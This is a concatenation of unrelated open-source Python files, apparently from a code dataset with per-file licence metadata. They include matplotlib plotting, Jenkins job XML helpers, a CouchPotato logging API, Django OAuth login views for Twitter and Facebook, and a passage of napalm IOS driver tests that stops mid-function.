plt.xlabel('P=Preprints, T=Theses')
# Set up the xtick locations and labels. Note that you have to offset
# the position of the ticks by width/2, where width is the width of
# the bars.
ax.set_xticks(np.linspace(1,N,N) + width/2)
ax.set_xticklabels(xlabels)
# Create a title string
title_string = 'LibMesh Citations, (' + str(sum(n_papers)) + ' Total)'
fig.suptitle(title_string)
# Save as PDF
plt.savefig('libmesh_citations.pdf')
# Local Variables:
# python-indent: 2
# End:
| lgpl-2.1 | 302,535,557,434,097,100 | 26.529412 | 78 | 0.674359 | false | 2.962025 | false | false | false |
Strangemother/python-state-machine | scratch/machine_4/integration.py | 1 | 4183 | from tools import color_print as cl
class ConditionIntegrate(object):
def read_node(self, node):
'''
Read the conditions of a node.
'''
if hasattr(node, 'conditions') is False:
return
cnds = node.conditions()
# cl('yellow', 'get conditions for node', node)
self.integrate_conditions(cnds, node)
def integrate_conditions(self, conditions, node):
'''
Implement a list of conditions against one node.
'''
for c in conditions:
self.integrate_condition(c, node)
def integrate_condition(self, cond, node):
'''
Integrate the conditions into the condition runner
'''
if hasattr(self, 'condition_keys') is False:
setattr(self, 'condition_keys', {})
if hasattr(self, 'condition_nodes') is False:
setattr(self, 'condition_nodes', {})
names = self.get_integration_names(node, cond)
# cl('yellow', 'integrate conditions', node, cond, names)
self.append_with_names(names, cond)
# node, condition assications
ck = self.condition_keys
sc = str(cond)
if (sc in ck) is False:
ck[sc] = []
ck[sc].append(node.get_name())
def get_integration_names(self, node, condition):
node_name = node.get_name()
names = (node_name, str(condition), )
return names
def run_conditions(self, conditions, node, value, field):
# pprint(self.conditions._names)
# cl('yellow', 'run conditions', conditions, node, field)
pairs = []
# fetch associated conditions.
# make the condition perform the compare
for cond in conditions:
# get associated nodes for the condition
node_names = self.condition_keys.get(str(cond)) or []
# loop and get associated condition
for nn in node_names:
s = '{0}-{1}'.format(nn, str(cond))
r = self.get(s) or []
f = [(self.nodes.get(nn), set(r),)]
# cl('yellow', 'found', f)
pairs.extend( f )
res = {}
for parent_nodes, _conditions in pairs:
for cnd in _conditions:
for pn in parent_nodes:
v = cnd.validate(pn, node, value, field)
n = '{0}-{1}'.format(pn.get_name(), str(cnd))
res[n]= v
# cl('blue', 'conditions', res)
return res
def find_conditions(self, node, field, value):
n = '{0}_{1}_{2}'.format(node.get_name(), field, value)
# print '+ find conditions on', n
cnds = self.get_conditions(node, field, value)
# cl('yellow', '-- Matches condition', cnds)
return cnds
def get_conditions(self, node, name, value=None):
'''
Get conditions based upon node and name
'''
node_name = node
cl('red', 'get condition', node, name, value)
cnds = self.conditions
if hasattr(node_name, 'get_name'):
node_name = node.get_name()
name1 = '{0}_{1}'.format(node_name, name)
match_names = (name1, )
# exact match string
if value is not None:
vcn = '{0}_{1}_{2}'.format(node_name, name, value)
match_names += (vcn,)
res = []
for _n in match_names:
res += self.get_conditions_by_name(_n) or []
# print 'found conditions', res
return set(res)
def get_conditions_by_name(self, name):
'''
return the conditions matching a name provided.
'''
cnds = self.conditions.get(name)
# print 'get_condition_by_name:', name, cnds
return cnds
def condition_name(self, node, name, *args, **kw):
'''
create a name for a condition string match from the
values passed.
The node is the original object receiving the change.
        name denotes the key that is changing.
        Returned is a string name for the condition.
'''
n = node.get_name()
a = [n, args[0]]
s = '_'.join(a)
return s
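
# Illustrative sketch (not part of the original module): the association keys
# built above follow a "<node name>-<str(condition)>" pattern. Assuming a node
# named "node_a" and a condition whose str() is "cond_x", the stored key is:
#
#     '{0}-{1}'.format('node_a', 'cond_x')  # -> 'node_a-cond_x'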
| mit | -4,974,785,414,804,036,000 | 31.176923 | 65 | 0.537413 | false | 4.061165 | false | false | false |
caio1982/capomastro | jenkins/utils.py | 1 | 4525 | from urlparse import urljoin
import xml.etree.ElementTree as ET
from django.conf import settings
from django.core.urlresolvers import reverse
from django.template import Template, Context
from django.utils import timezone
from django.utils.text import slugify
PARAMETERS = ".//properties/hudson.model.ParametersDefinitionProperty/parameterDefinitions/"
def get_notifications_url(base, server):
"""
Returns the full URL for notifications given a base.
"""
url = urljoin(base, reverse("jenkins_notifications"))
return url + "?server=%d" % server.pk
def get_context_for_template(job, server):
"""
Returns a Context for the Job XML templating.
"""
defaults = DefaultSettings({"NOTIFICATION_HOST": "http://localhost"})
url = get_notifications_url(defaults.NOTIFICATION_HOST, server)
context_vars = {
"notifications_url": url,
"job": job,
"jobtype": job.jobtype,
}
return Context(context_vars)
def get_job_xml_for_upload(job, server):
"""
Return config_xml run through the template mechanism.
"""
template = Template(job.jobtype.config_xml)
context = get_context_for_template(job, server)
# We need to strip leading/trailing whitespace in order to avoid having the
# <?xml> PI not in the first line of the document.
job_xml = template.render(context).strip()
requestor = JenkinsParameter(
"REQUESTOR", "The username requesting the build", "")
job_xml = add_parameter_to_job(requestor, job_xml)
return job_xml
def generate_job_name(jobtype):
"""
Generates a "unique" id.
"""
return "%s_%s" % (slugify(jobtype.name), timezone.now().strftime("%s"))
class DefaultSettings(object):
"""
Allows easy configuration of default values for a Django settings.
e.g. values = DefaultSettings({"NOTIFICATION_HOST": "http://example.com"})
values.NOTIFICATION_HOST # returns the value from the default django
settings, or the default if not provided in the settings.
"""
class _defaults(object):
pass
def __init__(self, defaults):
self.defaults = self._defaults()
for key, value in defaults.iteritems():
setattr(self.defaults, key, value)
def __getattr__(self, key):
return getattr(settings, key, getattr(self.defaults, key))
def get_value_or_none(self, key):
"""
Doesn't raise an AttributeError in the event that the key doesn't
exist.
"""
return getattr(settings, key, getattr(self.defaults, key, None))
def parse_parameters_from_job(body):
"""
Parses the supplied XML document and extracts all parameters, returns a
list of dictionaries with the details of the parameters extracted.
"""
result = []
root = ET.fromstring(body)
for param in root.findall(PARAMETERS):
item = {}
for param_element in param.findall("./"):
item[param_element.tag] = param_element.text
result.append(item)
return result
class JenkinsParameter(object):
"""Represents a parameter for a Jenkins job."""
definition = "TextParameterDefinition"
def __init__(self, name, description, default):
self.name = name
self.description = description
self.default = default
@property
def type(self):
return "hudson.model.%s" % self.definition
def parameter_to_xml(param):
"""
Converts a JenkinsParameter to the XML element representation for a Jenkins
job parameter.
"""
element = ET.Element(param.type)
ET.SubElement(element, "name").text = param.name
ET.SubElement(element, "description").text = param.description
ET.SubElement(element, "defaultValue").text = param.default
return element
def add_parameter_to_job(param, job):
"""
Adds a JenkinsParameter to an existing job xml document, returns the job XML
as a string.
# NOTE: This does nothing to check whether or not the parameter already
# exists.
"""
root = ET.fromstring(job)
parameters_container = root.find(PARAMETERS[:-1])
if parameters_container is None:
parameters = root.find(".//hudson.model.ParametersDefinitionProperty")
if parameters is None:
parameters = ET.SubElement(root, "hudson.model.ParametersDefinitionProperty")
parameters_container = ET.SubElement(parameters, "parameterDefinitions")
parameters_container.append(parameter_to_xml(param))
return ET.tostring(root)
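
# Illustrative usage sketch (not part of the original module); the minimal job
# document below is an assumption for demonstration only.
if __name__ == "__main__":
    example_param = JenkinsParameter(
        "EXAMPLE", "A hypothetical demonstration parameter", "default-value")
    example_job = "<project><properties/></project>"
    # Prints the job XML with the new text parameter definition appended.
    print add_parameter_to_job(example_param, example_job)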
| mit | 3,326,860,643,878,144,500 | 29.993151 | 92 | 0.671381 | false | 4.170507 | false | false | false |
koomik/CouchPotatoServer | couchpotato/core/plugins/log/main.py | 1 | 4216 | import os
import traceback
from couchpotato.api import addApiView
from couchpotato.core.helpers.encoding import toUnicode
from couchpotato.core.helpers.variable import tryInt
from couchpotato.core.logger import CPLog
from couchpotato.core.plugins.base import Plugin
from couchpotato.environment import Env
log = CPLog(__name__)
class Logging(Plugin):
def __init__(self):
addApiView('logging.get', self.get, docs = {
'desc': 'Get the full log file by number',
'params': {
'nr': {'desc': 'Number of the log to get.'}
},
'return': {'type': 'object', 'example': """{
'success': True,
'log': string, //Log file
'total': int, //Total log files available
}"""}
})
addApiView('logging.partial', self.partial, docs = {
'desc': 'Get a partial log',
'params': {
'type': {'desc': 'Type of log', 'type': 'string: all(default), error, info, debug'},
'lines': {'desc': 'Number of lines. Last to first. Default 30'},
},
'return': {'type': 'object', 'example': """{
'success': True,
'log': string, //Log file
}"""}
})
addApiView('logging.clear', self.clear, docs = {
'desc': 'Remove all the log files'
})
addApiView('logging.log', self.log, docs = {
'desc': 'Log errors',
'params': {
'type': {'desc': 'Type of logging, default "error"'},
'**kwargs': {'type': 'object', 'desc': 'All other params will be printed in the log string.'},
}
})
def get(self, nr = 0, **kwargs):
nr = tryInt(nr)
current_path = None
total = 1
for x in range(0, 50):
path = '%s%s' % (Env.get('log_path'), '.%s' % x if x > 0 else '')
# Check see if the log exists
if not os.path.isfile(path):
total = x - 1
break
# Set current path
            if x == nr:
current_path = path
log_content = ''
if current_path:
f = open(current_path, 'r')
log_content = f.read()
return {
'success': True,
'log': toUnicode(log_content),
'total': total,
}
def partial(self, type = 'all', lines = 30, **kwargs):
total_lines = tryInt(lines)
log_lines = []
for x in range(0, 50):
path = '%s%s' % (Env.get('log_path'), '.%s' % x if x > 0 else '')
# Check see if the log exists
if not os.path.isfile(path):
break
f = open(path, 'r')
reversed_lines = toUnicode(f.read()).split('[0m\n')
reversed_lines.reverse()
brk = False
for line in reversed_lines:
if type == 'all' or '%s ' % type.upper() in line:
log_lines.append(line)
if len(log_lines) >= total_lines:
brk = True
break
if brk:
break
log_lines.reverse()
return {
'success': True,
'log': '[0m\n'.join(log_lines),
}
def clear(self, **kwargs):
for x in range(0, 50):
path = '%s%s' % (Env.get('log_path'), '.%s' % x if x > 0 else '')
if not os.path.isfile(path):
continue
try:
# Create empty file for current logging
                if x == 0:
self.createFile(path, '')
else:
os.remove(path)
except:
log.error('Couldn\'t delete file "%s": %s', (path, traceback.format_exc()))
return {
'success': True
}
def log(self, type = 'error', **kwargs):
try:
log_message = 'API log: %s' % kwargs
try:
getattr(log, type)(log_message)
except:
log.error(log_message)
except:
log.error('Couldn\'t log via API: %s', kwargs)
return {
'success': True
}
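
# Illustrative note (not part of the original plugin): the handlers above are
# reached through the API routes registered in __init__, e.g. a call to the
# 'logging.partial' endpoint with type='error' and lines=50 ends up invoking
# Logging.partial(type = 'error', lines = 50).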
| gpl-3.0 | -6,851,123,021,384,806,000 | 26.376623 | 110 | 0.463947 | false | 4.026743 | false | false | false |
WilsonWangTHU/neural_graph_evolution | graph_util/structure_mapper.py | 1 | 7819 | #!/usr/bin/env python2
# -----------------------------------------------------------------------------
# @author:
# Tingwu Wang, Jun 23rd, 2017
# -----------------------------------------------------------------------------
import init_path
from util import logger
from . import mujoco_parser
import numpy as np
_BASE_DIR = init_path.get_base_dir()
def map_output(transfer_env, i_value, added_constant, gnn_option_list):
'''
@brief:
i_value could be the logstd (1, num_action), policy_output/w
(64, num_action), policy_output/b (1, num_action)
'''
assert len(gnn_option_list) == 4
    i_value = np.transpose(i_value)  # move num_action to the leading axis
ienv, oenv = [env + '-v1' for env in transfer_env.split('2')]
ienv_info = mujoco_parser.parse_mujoco_graph(
ienv,
gnn_node_option=gnn_option_list[0],
root_connection_option=gnn_option_list[1],
gnn_output_option=gnn_option_list[2],
gnn_embedding_option=gnn_option_list[3]
)
oenv_info = mujoco_parser.parse_mujoco_graph(
oenv,
gnn_node_option=gnn_option_list[0],
root_connection_option=gnn_option_list[1],
gnn_output_option=gnn_option_list[2],
gnn_embedding_option=gnn_option_list[3]
)
if len(i_value.shape) > 1:
o_value = np.zeros([len(oenv_info['output_list']), i_value.shape[1]])
else:
# the b matrix
o_value = np.zeros([len(oenv_info['output_list'])])
assert len(i_value) == len(ienv_info['output_list'])
ienv_node_name_list = [node['name'] for node in ienv_info['tree']]
for output_id, output_node_id in enumerate(oenv_info['output_list']):
# get the name of the joint
node_name = oenv_info['tree'][output_node_id]['name']
        # if the node is already in the input environment?
if node_name in ienv_node_name_list:
if ienv_node_name_list.index(node_name) not in \
ienv_info['output_list']:
logger.warning('Missing joint: {}'.format(node_name))
continue
o_value[output_id] = i_value[
ienv_info['output_list'].index(
ienv_node_name_list.index(node_name)
)
]
else:
# the name format: "@type_@name_@number", e.g.: joint_leg_1
assert len(node_name.split('_')) == 3
# find all the repetitive node and calculate the average
repetitive_struct_node_list = [
ienv_node_name_list.index(name)
for name in ienv_node_name_list
if node_name.split('_')[1] == name.split('_')[1]
]
num_reptitive_nodes = float(len(repetitive_struct_node_list))
assert len(repetitive_struct_node_list) >= 1
for i_node_id in repetitive_struct_node_list:
o_value[output_id] += i_value[
ienv_info['output_list'].index(i_node_id)
] / num_reptitive_nodes
return np.transpose(o_value) + added_constant
def map_input(transfer_env, i_value, added_constant, gnn_option_list):
assert len(gnn_option_list) == 4
ienv, oenv = [env + '-v1' for env in transfer_env.split('2')]
ienv_info = mujoco_parser.parse_mujoco_graph(
ienv,
gnn_node_option=gnn_option_list[0],
root_connection_option=gnn_option_list[1],
gnn_output_option=gnn_option_list[2],
gnn_embedding_option=gnn_option_list[3]
)
oenv_info = mujoco_parser.parse_mujoco_graph(
oenv,
gnn_node_option=gnn_option_list[0],
root_connection_option=gnn_option_list[1],
gnn_output_option=gnn_option_list[2],
gnn_embedding_option=gnn_option_list[3]
)
o_value = np.zeros([oenv_info['debug_info']['ob_size'], i_value.shape[1]])
assert len(i_value) == ienv_info['debug_info']['ob_size']
ienv_node_name_list = [node['name'] for node in ienv_info['tree']]
for output_id, output_node_id in oenv_info['input_dict'].items():
# get the name of the joint
node_name = oenv_info['tree'][output_id]['name']
        # if the node is already in the input environment?
if node_name in ienv_node_name_list:
o_value[output_node_id] = i_value[
ienv_info['input_dict'][
ienv_node_name_list.index(node_name)
]
]
else:
continue
return o_value
def map_transfer_env_running_mean(ienv, oenv, running_mean_info,
observation_size,
gnn_node_option, root_connection_option,
gnn_output_option, gnn_embedding_option):
# parse the mujoco information
ienv_info = mujoco_parser.parse_mujoco_graph(
ienv,
gnn_node_option=gnn_node_option,
root_connection_option=root_connection_option,
gnn_output_option=gnn_output_option,
gnn_embedding_option=gnn_embedding_option
)
oenv_info = mujoco_parser.parse_mujoco_graph(
oenv,
gnn_node_option=gnn_node_option,
root_connection_option=root_connection_option,
gnn_output_option=gnn_output_option,
gnn_embedding_option=gnn_embedding_option
)
i_running_mean_info = running_mean_info
    # seed the running mean from the source env, scaled by start_coeff (currently 1)
start_coeff = 1
o_running_mean_info = {
'step': i_running_mean_info['step'] * start_coeff,
'mean': np.zeros([observation_size]),
'variance': np.zeros([observation_size]),
'square_sum': np.zeros([observation_size]),
'sum': np.zeros([observation_size])
}
ienv_node_name_list = [node['name'] for node in ienv_info['tree']]
for node, oenv_digit in oenv_info['input_dict'].items():
node_name = oenv_info['tree'][node]['name']
        # if the node is already in the input environment?
if node_name in ienv_node_name_list:
ienv_digit = ienv_info['input_dict'][
ienv_node_name_list.index(node_name)
]
assert len(ienv_digit) == len(oenv_digit)
# assign the value!
for key in ['square_sum', 'sum']:
o_running_mean_info[key][oenv_digit] = \
i_running_mean_info[key][ienv_digit] * start_coeff
for key in ['mean', 'variance']:
o_running_mean_info[key][oenv_digit] = \
i_running_mean_info[key][ienv_digit]
else:
# the name format: "@type_@name_@number", e.g.: joint_leg_1
assert len(node_name.split('_')) == 3
# find all the repetitive node and calculate the average
repetitive_struct_node_list = [
ienv_node_name_list.index(name)
for name in ienv_node_name_list
if node_name.split('_')[1] == name.split('_')[1]
]
assert len(repetitive_struct_node_list) >= 1
num_reptitive_nodes = float(len(repetitive_struct_node_list))
for i_node_id in repetitive_struct_node_list:
ienv_digit = ienv_info['input_dict'][i_node_id]
assert len(ienv_digit) == len(oenv_digit)
# assign the value!
for key in ['square_sum', 'sum']:
o_running_mean_info[key][oenv_digit] += \
i_running_mean_info[key][ienv_digit] * \
start_coeff / num_reptitive_nodes
for key in ['mean', 'variance']:
o_running_mean_info[key][oenv_digit] += \
i_running_mean_info[key][ienv_digit] / \
num_reptitive_nodes
return o_running_mean_info
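
# Illustrative sketch (not part of the original module): a transfer_env string
# encodes source and target environments separated by '2', and node names use
# the "@type_@name_@number" convention checked above. The environment names
# below are assumptions for demonstration only.
#
#     ienv, oenv = [env + '-v1' for env in 'CentipedeFour2CentipedeSix'.split('2')]
#     # ienv == 'CentipedeFour-v1', oenv == 'CentipedeSix-v1'
#     'joint_leg_1'.split('_')  # -> ['joint', 'leg', '1']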
| mit | 7,428,175,684,621,202,000 | 40.152632 | 79 | 0.553012 | false | 3.399565 | false | false | false |
vitordeatorreao/amproj | amproj/datasets/dataset.py | 1 | 3520 | """Base class for a memory representation of any dataset"""
class Dataset:
"""Represents a dataset read to memory"""
def __init__(self, feature_names=[]):
"""Initializes a new instance of Dataset
Parameters
----------
feature_names : list<str>, optional
List of names of the features present in this dataset.
"""
if type(feature_names) != list:
raise TypeError(
"The `feature_names` argument must be of type list")
self.features = [str(name) for name in feature_names]
self.data = []
def add_datapoint(self, datapoint):
"""Adds a datapoint to the dataset
Parameters
----------
datapoint : list
A list containing the feature values.
"""
point = {} # datapoint to be built and inserted in the dataset
if len(self.features) == 0: # in case there are no feature names
if len(self.data) > 0 and len(self.data[0]) != len(datapoint):
raise TypeError("The new datapoint must be of the same size " +
"as the other datapoints. The new datapoint " +
"has size " + str(len(datapoint)) + ", but " +
"the other datapoints have size " +
str(len(self.data[0])) + ".")
i = 0
for value in datapoint:
point["feature" + str(i)] = self.__tryparse__(value)
i += 1
self.data.append(point)
return
if len(datapoint) != len(self.features):
raise TypeError("The datapoint must be of the same size as " +
"the features list. The features list has size " +
str(len(self.features)) + " and the datapoint " +
"has size " + str(len(datapoint)) + ". The " +
"datapoint is " + str(datapoint))
i = 0
for feature_name in self.features:
point[feature_name] = self.__tryparse__(datapoint[i])
i += 1
self.data.append(point) # actually adds the datapoint to the set
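
    # Illustrative usage sketch (not part of the original class); the feature
    # names and values below are made up for demonstration:
    #   d = Dataset(feature_names=["height", "width", "label"])
    #   d.add_datapoint(["1.8", "2", "tree"])
    #   d[0]  # -> {"height": 1.8, "width": 2, "label": "tree"}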
def __len__(self):
"""Returns the length of this dataset"""
return len(self.data)
def __iter__(self):
"""Iterates through the objects in this dataset"""
return iter(self.data)
def __getitem__(self, key):
"""Gets the dataset at the specified index"""
if type(key) != int:
raise TypeError("The index must be an integer, instead got " + key)
return self.data[key]
def __tryparse__(self, value):
"""Parses the value into int, float or string
Parameters
----------
value : str
A value to be parsed.
Returns
-------
val : int, float or str
The value after being parsed to its correct type.
Notes
-----
The value will be parsed in a try and error way. First, we try to cast
it to int. If that fails, we try to cast it to float. And if that fails
as well, we simply return it as string.
"""
        # Non-string values are returned unchanged; strings are stripped first.
        if type(value) != str:
            return value
        value = value.strip()
try:
return int(value)
except ValueError:
pass
try:
return float(value)
except ValueError:
pass
return value
| gpl-2.0 | 126,932,584,548,431,800 | 34.555556 | 79 | 0.511932 | false | 4.637681 | false | false | false |
lmorchard/badger | apps/socialconnect/views.py | 1 | 12314 | import urllib, urllib2
import cgi
import os
from django.conf import settings
from django.http import HttpResponseRedirect, HttpResponse
from django.contrib.auth import login, authenticate, REDIRECT_FIELD_NAME
from django.shortcuts import get_object_or_404, render_to_response
from django.template import RequestContext
from django.core.urlresolvers import reverse
from django.contrib.auth.decorators import login_required
from django.contrib.sites.models import Site
from django.utils.http import urlquote
from django.utils import simplejson as json
from django.utils.translation import ugettext, ugettext_lazy as _
from django.contrib import messages
from oauthtwitter import OAuthApi
from oauth import oauth
import oauthtwitter
from pinax.apps.account.utils import get_default_redirect, user_display
from pinax.apps.account.views import login as account_login
from socialconnect.utils import Router, BaseView
from socialconnect.forms import OauthSignupForm
from socialconnect.models import UserOauthAssociation
TWITTER_CONSUMER_KEY = getattr(settings, 'TWITTER_CONSUMER_KEY', 'YOUR_KEY')
TWITTER_CONSUMER_SECRET = getattr(settings, 'TWITTER_CONSUMER_SECRET', 'YOUR_SECRET')
FACEBOOK_CONSUMER_KEY = getattr(settings, 'FACEBOOK_CONSUMER_KEY', 'YOUR_KEY')
FACEBOOK_CONSUMER_SECRET = getattr(settings, 'FACEBOOK_CONSUMER_SECRET', 'YOUR_SECRET')
class ManagementView(BaseView):
"""Connection management view, mainly for removing associations"""
urlname_pattern = 'socialconnect_manage_%s'
def do_associations(self, request):
v = self.require_login(request)
if v is not True: return v
if request.method == "POST":
a_id = request.POST.get('id', None)
try:
assoc = UserOauthAssociation.objects.get(
user = request.user, id = a_id)
messages.add_message(request, messages.SUCCESS,
ugettext("""
Successfully deleted connection to %(auth_type)s
screen name %(username)s.
""") % {
"auth_type": assoc.auth_type,
"username": assoc.username
}
)
assoc.delete()
except UserOauthAssociation.DoesNotExist:
pass
return HttpResponseRedirect(reverse(
self.urlname_pattern % 'associations'))
associations = UserOauthAssociation.objects.filter(user=request.user)
return self.render(request, 'associations.html', {
'associations': associations
})
class BaseAuthView(BaseView):
def do_signin(self, request):
"""Perform sign in via OAuth"""
request.session['socialconnect_mode'] = request.GET.get('mode', 'signin')
next = request.GET.get(REDIRECT_FIELD_NAME, '/')
if next:
request.session['redirect_to'] = next
return HttpResponseRedirect(self.get_signin_url(request))
def do_callback(self, request):
"""Handle response from OAuth permit/deny"""
# TODO: Handle OAuth denial!
mode = request.session.get('socialconnect_mode', None)
profile = self.get_profile_from_callback(request)
if not profile: return HttpResponse(status=400)
request.session[self.session_profile] = profile
success_url = get_default_redirect(request, REDIRECT_FIELD_NAME)
if not success_url or 'None' == success_url:
success_url = '/'
try:
# Try looking for an association to perform a login.
assoc = UserOauthAssociation.objects.filter(
auth_type=self.auth_type,
profile_id=profile['id'],
username=profile['username']
).get()
if 'connect' == mode:
messages.add_message(request, messages.ERROR,
ugettext("""This service is already connected to another
account!""")
)
return HttpResponseRedirect(reverse(
ManagementView().urlname_pattern % 'associations'))
else:
self.log_in_user(request, assoc.user)
return HttpResponseRedirect(success_url)
except UserOauthAssociation.DoesNotExist:
# No association found, so...
if not request.user.is_authenticated():
# If no login session, bounce to registration
return HttpResponseRedirect(reverse(
self.urlname_pattern % 'register'))
else:
# If there's a login session, create an association to the
# currently logged in user.
assoc = self.create_association(request, request.user, profile)
del request.session[self.session_profile]
if 'connect' == mode:
return HttpResponseRedirect(reverse(
ManagementView().urlname_pattern % 'associations'))
else:
return HttpResponseRedirect(success_url)
def get_registration_form_class(self, request):
return OauthSignupForm
def do_register(self, request):
"""Handle registration with association"""
# Ensure that Twitter signin details are present in the session
profile = request.session.get(self.session_profile, None)
if not profile: return HttpResponse(status=400)
RegistrationForm = self.get_registration_form_class(request)
success_url = get_default_redirect(request, REDIRECT_FIELD_NAME)
if request.method != "POST":
# Pre-fill form with suggested info based in Twitter signin
form = RegistrationForm(initial = self.initial_from_profile(profile))
else:
form = RegistrationForm(request.POST)
if form.is_valid():
user = form.save(request=request)
assoc = self.create_association(request, user, profile)
self.log_in_user(request, user)
return HttpResponseRedirect(success_url)
return self.render(request, 'register.html', {
'form': form,
'auth_label': self.auth_label,
'signin_url': reverse(self.urlname_pattern % 'signin'),
"action": request.path,
})
def create_association(self, request, user, profile):
"""Create an association between this user and the given profile"""
assoc = UserOauthAssociation(
user=user,
auth_type=self.auth_type,
profile_id=profile['id'],
username=profile['username'],
access_token=profile['access_token']
)
assoc.save()
messages.add_message(request, messages.SUCCESS,
ugettext("""
Successfully associated %(user)s with %(auth_label)s
screen name %(username)s.
""") % {
"user": user_display(request.user),
"auth_label": self.auth_label,
"username": profile['username']
}
)
def suggest_nickname(self, nickname):
"Return a suggested nickname that has not yet been taken"
from django.contrib.auth.models import User
if not nickname:
return ''
original_nickname = nickname
suffix = None
while User.objects.filter(username = nickname).count():
if suffix is None:
suffix = 1
else:
suffix += 1
nickname = original_nickname + str(suffix)
return nickname
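
    # Illustrative note (not part of the original class): if "alice" is already
    # taken, the loop above yields "alice1", then "alice2", and so on until a
    # free username is found.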
def log_in_user(self, request, user):
# Remember, openid might be None (after registration with none set)
from django.contrib.auth import login
# Nasty but necessary - annotate user and pretend it was the regular
# auth backend. This is needed so django.contrib.auth.get_user works:
user.backend = 'django.contrib.auth.backends.ModelBackend'
login(request, user)
class TwitterAuthView(BaseAuthView):
auth_type = "twitter"
auth_label = _("Twitter")
urlname_pattern = 'socialconnect_twitter_%s'
consumer_key = TWITTER_CONSUMER_KEY
consumer_secret = TWITTER_CONSUMER_SECRET
session_access_token = 'twitter_access_token'
session_profile = 'twitter_profile'
def get_signin_url(self, request):
twitter = OAuthApi(self.consumer_key, self.consumer_secret)
request_token = twitter.getRequestToken()
request.session['twitter_request_token'] = request_token.to_string()
return twitter.getSigninURL(request_token)
def get_profile_from_callback(self, request):
"""Extract the access token and profile details from OAuth callback"""
request_token = request.session.get('twitter_request_token', None)
if not request_token: return None
token = oauth.OAuthToken.from_string(request_token)
if token.key != request.GET.get('oauth_token', 'no-token'):
return HttpResponse(status=400)
twitter = OAuthApi(self.consumer_key, self.consumer_secret, token)
access_token = twitter.getAccessToken()
twitter = oauthtwitter.OAuthApi(self.consumer_key,
self.consumer_secret, access_token)
try:
profile = twitter.GetUserInfo()
except:
return None
return {
'access_token': access_token.to_string(),
'id': profile.id,
'username': profile.screen_name,
'fullname': profile.name,
'email': '',
}
def initial_from_profile(self, profile):
fullname = profile['fullname']
first_name, last_name = '', ''
if fullname:
bits = fullname.split()
first_name = bits[0]
if len(bits) > 1:
last_name = ' '.join(bits[1:])
return {
'username': self.suggest_nickname(profile.get('username','')),
'first_name': first_name,
'last_name': last_name,
'email': ''
}
class FacebookAuthView(BaseAuthView):
auth_type = "facebook"
auth_label = _("Facebook")
urlname_pattern = 'socialconnect_facebook_%s'
consumer_key = FACEBOOK_CONSUMER_KEY
consumer_secret = FACEBOOK_CONSUMER_SECRET
session_access_token = 'facebook_access_token'
session_profile = 'facebook_profile'
def get_signin_url(self, request):
args = {
'client_id': self.consumer_key,
'redirect_uri': request.build_absolute_uri(
reverse('socialconnect_facebook_callback')),
'scope': 'publish_stream,offline_access'
}
return ("https://graph.facebook.com/oauth/authorize?" +
urllib.urlencode(args))
def get_profile_from_callback(self, request):
code = request.GET.get('code', None)
args = {
'client_id': self.consumer_key,
'client_secret': self.consumer_secret,
'redirect_uri': request.build_absolute_uri(
reverse('socialconnect_facebook_callback')),
'code': code,
}
response = cgi.parse_qs(urllib2.urlopen(
"https://graph.facebook.com/oauth/access_token?" +
urllib.urlencode(args)
).read())
access_token = response["access_token"][-1]
profile = json.load(urllib2.urlopen("https://graph.facebook.com/me?" +
urllib.urlencode(dict(access_token=access_token))))
return {
'access_token': access_token,
'id': profile['id'],
'username': os.path.basename(profile.get('link','')),
'fullname': profile.get('name', ''),
'first_name': profile.get('first_name', ''),
'last_name': profile.get('last_name', ''),
'email': '',
}
def initial_from_profile(self, profile):
return {
'username': self.suggest_nickname(profile.get('username','')),
'first_name': profile.get('first_name', ''),
'last_name': profile.get('last_name', ''),
'email': ''
}
| bsd-3-clause | 6,301,588,463,236,984,000 | 36.889231 | 87 | 0.598993 | false | 4.369766 | false | false | false |
napalm-automation/napalm | test/ios/TestIOSDriver.py | 1 | 6582 | # Copyright 2015 Spotify AB. All rights reserved.
#
# The contents of this file are licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Tests for IOSDriver."""
import unittest
from napalm.ios import ios
from napalm.base.test.base import TestConfigNetworkDriver, TestGettersNetworkDriver
import re
class TestConfigIOSDriver(unittest.TestCase, TestConfigNetworkDriver):
"""Configuration Tests for IOSDriver.
Core file operations:
load_replace_candidate Tested
load_merge_candidate Tested
compare_config Tested
commit_config Tested
discard_config Tested
rollback Tested
Internal methods:
_enable_confirm Tested
_disable_confirm Tested
_gen_rollback_cfg Tested as part of rollback
_check_file_exists Tested
Misc methods:
open Tested
close Skipped
normalize_compare_config Tested (indirectly)
scp_file Tested
gen_full_path Tested
"""
@classmethod
def setUpClass(cls):
"""Executed when the class is instantiated."""
ip_addr = "127.0.0.1"
username = "vagrant"
password = "vagrant"
cls.vendor = "ios"
optional_args = {"port": 12204, "dest_file_system": "bootflash:"}
cls.device = ios.IOSDriver(
ip_addr, username, password, optional_args=optional_args
)
cls.device.open()
# Setup initial state
cls.device.load_replace_candidate(filename="%s/initial.conf" % cls.vendor)
cls.device.commit_config()
def test_ios_only_confirm(self):
"""Test _disable_confirm() and _enable_confirm().
_disable_confirm() changes router config so it doesn't prompt for confirmation
_enable_confirm() reenables this
"""
# Set initial device configuration
self.device.load_replace_candidate(filename="%s/initial.conf" % self.vendor)
self.device.commit_config()
# Verify initial state
output = self.device.device.send_command("show run | inc file prompt")
output = output.strip()
self.assertEqual(output, "")
# Disable confirmation
self.device._disable_confirm()
output = self.device.device.send_command("show run | inc file prompt")
output = output.strip()
self.assertEqual(output, "file prompt quiet")
# Reenable confirmation
self.device._enable_confirm()
output = self.device.device.send_command("show run | inc file prompt")
output = output.strip()
self.assertEqual(output, "")
def test_ios_only_gen_full_path(self):
"""Test gen_full_path() method."""
output = self.device._gen_full_path(self.device.candidate_cfg)
self.assertEqual(output, self.device.dest_file_system + "/candidate_config.txt")
output = self.device._gen_full_path(self.device.rollback_cfg)
self.assertEqual(output, self.device.dest_file_system + "/rollback_config.txt")
output = self.device._gen_full_path(self.device.merge_cfg)
self.assertEqual(output, self.device.dest_file_system + "/merge_config.txt")
output = self.device._gen_full_path(
filename="running-config", file_system="system:"
)
self.assertEqual(output, "system:/running-config")
def test_ios_only_check_file_exists(self):
"""Test _check_file_exists() method."""
self.device.load_replace_candidate(filename="%s/initial.conf" % self.vendor)
valid_file = self.device._check_file_exists(
self.device.dest_file_system + "/candidate_config.txt"
